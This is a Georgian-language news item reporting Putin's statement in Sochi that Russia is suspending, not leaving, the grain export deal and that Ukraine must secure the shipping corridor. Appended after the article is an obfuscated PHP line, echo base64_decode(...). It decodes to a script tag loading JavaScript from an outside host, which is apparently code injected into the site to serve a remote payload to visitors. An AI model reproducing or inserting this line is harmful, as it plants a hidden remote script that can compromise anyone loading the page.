celsiusi
ავერსი საქკაბელი

რუსეთი არ წყვეტს მარცვლეულის ექსპორტის შეთანხმებაში მონაწილეობას, არამედ მხოლოდ აჩერებს, – ამის შესახებ სოჭში გამართულ პრესკონფერენციაზე რუსეთის პრეზიდენტმა, ვლადიმერ პუტინმა განაცხადა.

„ჩვენ არ ვამბობთ, რომ ვწყვეტთ ამ ოპერაციაში მონაწილეობას, არა. ჩვენ ვამბობთ, რომ ვაჩერებთ. გაერო-ს თანამშრომლები აქტიურად მონაწილეობენ მის მუშაობაში, რისთვისაც ჩვენ მათი მადლობელი ვართ. მაშინ, ჩაატარონ მათ მუშაობა უკრაინასთან და უკრაინამ უნდა გასცეს გარანტია, რომ სამოქალაქო გემებისთვის და რუსეთის მომარაგების გემებისთვის საფრთხეები არ შეიქმნება“, – განაცხადა პუტინმა.

გასულ შაბათს მოსკოვმა კიევი შავი ზღვის ფლოტზე თავდასხმაში დაადანაშაულა და გაერო-სა და თურქეთის შუამავლობით მიღწეული, მარცვლეულის ექსპორტის შეთანხმებიდან გასვლის შესახებ განაცხადა.

პუტინის თქმით, უკრაინამ უნდა უზრუნველყოს საზღვაო დერეფნის უსაფრთხოება, რომლითაც მარცვლეულის ექსპორტი ხდება.

„მოხვდება ასეთი უპილოტო გემს, – იქ არც ხორბლისგან და არც გემისგან არაფერი დარჩება. დამნაშავეები კი ჩვენ ვიქნებით. ამიტომ თავდაცვის სამინისტრო საკითხს სწორად აყენებს, რომ ჩატარდეს გაერო-სთან დამატებითი სამუშაო, გაერო-მ კი თავის მხრივ, უკრაინასთან, რომ უკრაინამ უზრუნველყოს ამ დერეფნის უსაფრთხოება“, – აღნიშნა პუტინმა.

464
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");